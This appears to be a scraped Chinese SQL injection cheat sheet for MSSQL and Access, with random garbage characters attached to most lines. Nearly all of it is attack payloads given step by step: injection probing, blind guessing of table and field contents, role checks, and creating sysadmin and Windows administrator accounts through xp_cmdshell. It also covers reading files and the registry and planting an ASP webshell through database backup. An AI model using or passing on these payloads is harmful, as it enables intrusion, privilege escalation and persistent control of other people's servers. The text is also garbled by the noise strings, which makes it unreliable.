1.判断是否有注入;and 1=1 ;and 1=2 Xq "Es
2.初步判断是否是mssql ;and user>0 zQUNvPYM
.[s6PzQy
3.注入参数是字符'and [查询条件] and ''=' g@pK9R%wH<
J HV
4.搜索时没过滤参数的'and [查询条件] and '%25'=' Q'?VLv|@
$ f||!g
5.判断数据库系统 f9+6gY
S,f#g?V
;and (select count(*) from sysobjects)>0 mssql woF{O)~X
)J2UNIgN
;and (select count(*) from msysobjects)>0 access 1/6}E]-F
DF-.|-^9I
B}K<L\S
J,s:CBCGL
6.猜数据库 ;and (select Count(*) from [数据库名])>0 FMzG6nrdBN
" BLJh)i
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 NbCIL8f]
P
m&^rC;
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 2 zG;91^
=WEDQ\ c
9.(1)猜字段的ascii值(access) ` .]oH1\
nT(AO-Ue^
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 I1s$\NZ~]
lhf5[Rp
(2)猜字段的ascii值(mssql) #\O'*mz
QIJ/'72
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 n</Rd=
=}Q|#C
10.测试权限结构(mssql) D 5:'2i
sM%l:Fv
8-cuaa
2 gca*
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- :"b :uQ
6\.LG4@LO
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- \'|t>|zhp
$Il
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- }wI+eMr
$ub0$S/Hu
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- DG&aFmC
a=v H:D
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- WGyPyG#Fl
W1ndb:
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- rj?c
Ug4o2n0sk
;and 1=(select IS_MEMBER('db_owner'));-- /;!I.|j
Xn>>hzj-x?
/x_AWnU
e-1G\}E
11.添加mssql和系统的帐户 WLta{A?
0O-"tP8o
;exec master.dbo.sp_addlogin username;-- ( )f)
;exec master.dbo.sp_password null,username,password;-- m'k>U4
uyWw3>
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- "5?1S-Vl
_j*I\
;exec master.dbo.xp_cmdshell 'net user username password 2U"2L^oKI
:JZV=@<T
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- \+0l#t$
I[w5V;>*
;exec master.dbo.xp_cmdshell 'net user username password /add';-- ![J_6f}!
~k}O"{
y
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- SUW=-M
A>HCX 4i
7W5Cm\
3-kL0Q["
12.(1)遍历目录 sYvlf0
vo2GFo
;create table dirs(paths varchar(100), id int) @2-;,VL3
9`? M-U
;insert dirs exec master.dbo.xp_dirtree 'c:\' W5~!)Ec
:_ =YH+bZ
;and (select top 1 paths from dirs)>0 6s
~!B{Q
.])X.7@x
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) :VLYF$|
c%(Ndi
R|``A5zQ
A..`?oGj
(2)遍历目录 !,]c}Y{i
[F(iV[n%
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- G2+ gEg
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 $M+'jjnP
BQ70<m2D$
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 d\tY-X3
FV,aQ#
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 k`5K&
)|AxQPd
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 -})zRL0!'
K@
&;f(Y
M-q5Jfm
rw0s$~'
13.mssql中的存储过程 %L
wq.
%Y5F@=>&
xp_regenumvalues 注册表根键, 子键 3f~znO
2iOYC0`!
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 ]D=fvvST
tDfHO1pS
xp_regread 根键,子键,键值名 475g-t2"@
XD_!5+\H1
;exec xp_regread h^''ue"
W
)Ps2
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 '*
/$66|
y7GgTC/H
xp_regwrite 根键,子键, 值名, 值类型, 值 ,ei=w,O
T7O)
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 %=\*OIhl
jpTk@
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 oL<5hN*D
_#{qDG=
xp_regdeletevalue 根键,子键,值名 ?C
?I"?J/zm
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 u]ps-R_$G
XV`8Vb
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 ;d]vAj
oJ/=&c
sBqOcy
02T'B&&~
14.mssql的backup创建webshell , q{~lf-
9>`dB
use model *&R|0I{>
V)ag ss w?
create table cmd(str image); v$5D&Tv
{ 9\/aXPS
insert into cmd(str) values (''); 2t45/:,
.C ,dV7
backup database model to disk='c:\l.asp'; b^P\Q s*m
#uICHt3
|B64%w>Y
036QV M$
15.mssql内置函数 mQ:YHtHE.F
a$bE2'cb
;and (select @@version)>0 获得Windows的版本号 +kD JZ
+>$Kmy[3
;and user_name()='dbo' 判断当前系统的连接用户是不是sa s'IB{lJ9
l
m(mY$B*_
;and (select user_name())>0 爆当前系统的连接用户 kf9]nIo
imhE=6{
;and (select db_name())>0 得到当前连接的数据库 {G<1.
1F3Q^3+
YNKvR
W ,v0~
16.简洁的webshell *O)i)["
iWW
>]3Q
use model /WK1( B:
UQ@szE
create table cmd(str image); &0J8ICd=
u|D L?c>W
insert into cmd(str) values (''); E]r<t#
KDA2
H>
backup database model to disk='g:\wwwtest\l.asp';